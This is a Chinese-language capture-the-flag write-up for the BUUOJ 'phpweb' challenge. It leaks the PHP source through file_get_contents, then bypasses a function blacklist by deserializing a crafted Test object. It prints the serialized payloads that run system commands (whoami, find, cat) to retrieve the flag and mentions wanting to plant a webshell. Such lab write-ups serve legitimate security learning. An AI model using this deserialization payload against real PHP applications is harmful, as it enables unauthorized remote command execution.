https://buuoj.cn/challenges#[%E7%BD%91%E9%BC%8E%E6%9D%AF%202020%20%E6%9C%B1%E9%9B%80%E7%BB%84]phpweb
每隔5s
会自动刷新,抓包
发现每次刷新,传递了两个POST参数func
和p
PS C:\Users\Administrator\Downloads> php -r "var_dump(date('Y-m-d h:i:s a'));"
Command line code:1:
string(22) "2021-04-23 04:18:46 pm"
猜测func
传递的是函数,p
传递的是参数,修改一下看看
接着试了一些eval
、system
、assert
、scandir
命令执行,代码执行,目录浏览等等函数都没行,估计是被过滤了,不过尝试file_get_contents
的时候成功读取到index.php
的源代码
<?php
$disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk", "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
function gettime($func, $p) {
$result = call_user_func($func, $p);
$a= gettype($result);
if ($a == "string") {
return $result;
} else {return "";}
}
class Test {
var $p = "Y-m-d h:i:s a";
var $func = "date";
function __destruct() {
if ($this->func != "") {
echo gettime($this->func, $this->p);
}
}
}
$func = $_REQUEST["func"];
$p = $_REQUEST["p"];
if ($func != null) {
$func = strtolower($func);
if (!in_array($func,$disable_fun)) {
echo gettime($func, $p);
}else {
die("Hacker...");
}
}
?>
代码审计,$func
不能含有$disable_fun
,使用的函数返回值只能是string
,不然无法返回。然后看到这个Test
类,如果能反序列化的话这里也能控制$func
和$p
,反序列化要使用unserialize()
函数,正好可以将$func
设置成unserialize
,$p
设置成对象的序列化字符串,最主要的就是如果从Tset
类这边控制$func
,就不用经过过滤。
<?php
class Test{
var $func = 'system';
var $p = "whoami;pwd;ls -lha ./";
}
$res = new Test();
echo serialize($res);
?>
func=unserialize&p=O:4:"Test":2:{s:4:"func";s:6:"system";s:1:"p";s:21:"whoami;pwd;ls -lha ./";}
找flag,根目录没找到,本来打算写一个shell上蚁剑,但是发现好像没有写入权限,只能找flag了
func=unserialize&p=O:4:"Test":2:{s:4:"func";s:6:"system";s:1:"p";s:19:"find / -name *flag*";}
func=unserialize&p=O:4:"Test":2:{s:4:"func";s:6:"system";s:1:"p";s:22:"cat /tmp/flagoefiu4r93";}